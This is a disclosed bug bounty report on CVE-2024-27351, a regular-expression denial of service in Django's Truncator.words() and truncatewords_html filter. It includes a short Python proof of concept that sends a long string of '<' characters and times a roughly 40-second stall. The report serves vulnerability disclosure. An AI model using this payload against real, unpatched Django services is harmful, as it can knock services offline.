# CVE-2024-27351: Potential regular expression denial-of-service in django.utils.text.Truncator.words()

### SUMMARY BY INTERNET BUG BOUNTY

CVE-2024-27351: Potential regular expression denial-of-service in django.utils.text.Truncator.words()
django.utils.text.Truncator.words() method (with html=True) and truncatewords_html template filter were subject to a potential regular expression denial-of-service attack using a suitably crafted string (follow up to CVE-2019-14232 and CVE-2023-43665).

Thanks Seokchan Yoon for the report.

This issue has severity "moderate" according to the Django security policy.

Full Security Advisory: https://www.djangoproject.com/weblog/2024/mar/04/security-releases/

### VULNERABILITY INFORMATION

# TL;DR

**CVE-2024-27351**: Potential regular expression denial-of-service in `django.utils.text.Truncator.words()`

# Details:

`django.utils.text.Truncator.words()` method (with `html=True`) and `truncatewords_html` template filter were subject to a potential regular expression denial-of-service attack using a suitably crafted string (follow up to CVE-2019-14232 and CVE-2023-43665).

- The `Truncator` class truncates text based on word count.
- When the `html` flag is set, the internal `_truncate_html()` method is used.
- This method relies on regular expressions stored in variables (`re_chars` and `re_words`) to perform the truncation.
- These regular expressions are vulnerable to ReDoS attacks, which can cause significant performance degradation and denial-of-service.

**PoC:**

```python
#!/usr/bin/env python3
from django.utils.text import Truncator
import time


MAX_LENGTH = 65535

payload = '<' * MAX_LENGTH
print('[INFO] %d bytes of payload' % len(payload))

start_time = time.time()
Truncator(payload).words(3, truncate='...', html=True) # BOOM!
end_time = time.time()

print('[INFO] Truncator().words() took %lf seconds' % (end_time - start_time))
```

The impact of this vulnerability may vary depending on the computing environment. In my tests using an AMD Ryzen 7 3700X with 32GB RAM, I observed a notable delay of approximately 40 seconds.

## Impact

An attacker could exploit this vulnerability to:

- Consume excessive server resources, causing performance degradation and potential service outages.
- Delay application response times significantly.

---

| Field | Value |
|-------|-------|
| **Report ID** | #2402193 |
| **Title** | CVE-2024-27351: Potential regular expression denial-of-service in django.utils.text.Truncator.words() |
| **URL** | https://hackerone.com/reports/2402193 |
| **State** | Resolved |
| **Severity** | Medium (?) |
| **Weakness** | Uncontrolled Resource Consumption |
| **CVE IDs** | CVE-2024-27351 |
| **Program** | Internet Bug Bounty |
| **Reporter** | scyoon |
| **Submitted** | March 5, 2024, 10:53AM UTC |
| **Disclosed** | April 28, 2024, 4:52PM UTC |
| **Visibility** | full |
| **Bounty** | None |

--- *Downloaded from https://hackerone.com/reports/2402193*